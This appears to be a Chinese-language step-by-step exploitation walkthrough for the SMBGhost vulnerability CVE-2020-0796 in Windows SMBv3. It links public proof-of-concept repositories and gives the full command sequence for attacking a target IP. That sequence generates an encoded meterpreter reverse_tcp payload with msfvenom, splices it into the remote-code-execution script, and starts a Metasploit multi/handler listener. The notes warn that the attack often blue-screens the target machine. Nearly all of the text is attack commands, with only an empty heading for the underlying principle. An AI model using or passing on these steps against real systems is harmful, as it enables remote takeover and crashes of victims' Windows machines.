CVE-2020-0796
page views 0
update 2024-07-11

1.CVE-2020-0796 (漏洞)
1.github 下载包 (https://github.com/eerykitty/CVE-2020-0796-PoC
2.cmd 输入 pip install ntlm_auth 下载
3.以 python CVE-2020-0796.py (目标机ip) 进行攻击
2. poc观点验证脚本
exp漏洞利用脚本
3.拿取控制权限(成功率不高,会导致被攻击机蓝屏)
1.https://github.com/chompie1337/SMBGhost_RCE_PoC (下载包)
2. kali 查看ip地址 (ifconfig) 目标机IP地址
3. GitHub 下载包
4. 生成木马程序
(msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=本机ip LPORT=5555 -b ‘\x00’ -i 5 -f python > exploit)
(-p windows/x64/meterpreter/bind_tcp
设置payload为windows64位meterpreter控制台下的反向连接,
LPORT=5555设置开发端口为5555,
-b ‘\x00’设置在生成的程序中避免出现’\x00’,
-i 5设置编码次数为5次,
-f python设置生成python格式文件)
5. 改写木马程序(vim 程序名)
:%s/buf/USER_PAYLOAD
:wq! (保存退出)
6.将木马程序内容替换至原文件
7.打开 msfconsole (渗透工具)
8. use exploit/multi/handler
9.set payload windows/x64/meterpreter/recerse_tcp
10.查看模块信息 show options
11.修改模块信息 set lhost 本机ip
set lport 端口号
12. run
13.python exploit.py -ip 目标ip (对目标进行攻击)Image.png(成功率不高,受攻击机会蓝屏)
image.png
(原理)